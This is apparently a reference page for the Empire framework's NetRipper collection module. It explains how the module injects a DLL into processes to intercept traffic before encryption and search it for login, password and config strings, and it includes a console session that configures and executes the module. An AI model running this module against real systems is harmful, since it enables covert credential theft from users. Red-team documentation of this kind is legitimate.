Invoke-NetRipper - Empire Module
This page contains detailed information about how to use the powershell/collection/netripper Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-NetRipper
Module: powershell/collection/netripper
Source code [1]: empire/server/modules/powershell/collection/netripper.yaml
Source code [2]: empire/server/data/module_source/collection/Invoke-NetRipper.ps1
MITRE ATT&CK:
T1179, T1410
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes
The netripper module injects NetRipper into targeted processes, which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the netripper module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the netripper module:
Agent
Agent to run module on.
SearchStrings
Strings to search for in traffic.
Default value: user,login,pass,database,config
.
Additional Module Options
This is a list of additional options that are supported by the netripper module:
AllData
Switch. Log all data instead of just plaintext.
Datalimit
Data limit capture per request.
Default value: 4096
.
LogLocation
Folder location to log sniffed data to.
Default value: TEMP
.
ProcessID
Specific process ID to inject the NetRipper dll into.
ProcessName
Inject the NetRipper dll into all processes with the given name (i.e. putty).
Netripper Example Usage
Here's an example of how to use the netripper module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/netripper
Author Ionut Popescu (@NytroRST)
@mattifestation
@harmj0y
Background True
Comments https://github.com/NytroRST/NetRipper/
Description Injects NetRipper into targeted processes, which uses API hooking in
order to intercept network traffic and encryption related functions
from a low privileged user, being able to capture both plain-text
traffic and encrypted traffic before encryption/after decryption.
Language powershell
Name powershell/collection/netripper
NeedsAdmin False
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1179
http://attack.mitre.org/techniques/T1410
,Record Options-,---------------------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|---------------|---------------------------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|---------------|---------------------------------|----------|-------------------------------------|
| AllData | | False | Switch. Log all data instead of |
| | | | just plaintext. |
|---------------|---------------------------------|----------|-------------------------------------|
| Datalimit | 4096 | False | Data limit capture per request. |
|---------------|---------------------------------|----------|-------------------------------------|
| LogLocation | TEMP | False | Folder location to log sniffed data |
| | | | to. |
|---------------|---------------------------------|----------|-------------------------------------|
| ProcessID | | False | Specific process ID to inject the |
| | | | NetRipper dll into. |
|---------------|---------------------------------|----------|-------------------------------------|
| ProcessName | | False | Inject the NetRipper dll into all |
| | | | processes with the given name (i.e. |
| | | | putty). |
|---------------|---------------------------------|----------|-------------------------------------|
| SearchStrings | user,login,pass,database,config | True | Strings to search for in traffic. |
'---------------'---------------------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/collection/netripper) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/netripper) > set SearchStrings user,login,pass,database,config
[*] Set SearchStrings to user,login,pass,database,config
(Empire: usemodule/powershell/collection/netripper) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Authors
- Ionut Popescu (@NytroRST)
- @mattifestation
- @harmj0y
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/collection/netripper.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/collection/Invoke-NetRipper.ps1
- https://github.com/NytroRST/NetRipper/
- http://attack.mitre.org/techniques/T1179
- http://attack.mitre.org/techniques/T1410
- https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
See Also
Check also the following modules related to this module:
- powershell/collection/get_sql_query
- powershell/collection/SharpLoginPrompt
- powershell/collection/file_finder
- powershell/collection/get_indexed_item
- powershell/collection/ninjacopy
- powershell/collection/clipboard_monitor
- powershell/collection/FoxDump
- powershell/collection/prompt
- powershell/collection/minidump
- powershell/collection/SauronEye
- powershell/collection/toasted
- powershell/collection/screenshot
- powershell/collection/find_interesting_file
- powershell/collection/inveigh
- powershell/collection/browser_data
- powershell/collection/WireTap
- powershell/collection/WebcamRecorder
- powershell/collection/ChromeDump
- powershell/collection/USBKeylogger
- powershell/collection/get_sql_column_sample_data
- powershell/collection/keylogger
- powershell/collection/get-winupdates
- powershell/collection/packet_capture
- powershell/collection/SharpChromium
- powershell/collection/vaults/remove_keepass_config_trigger
- powershell/collection/vaults/add_keepass_config_trigger
- powershell/collection/vaults/keethief
- powershell/collection/vaults/find_keepass_config
- powershell/collection/vaults/get_keepass_config_trigger
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.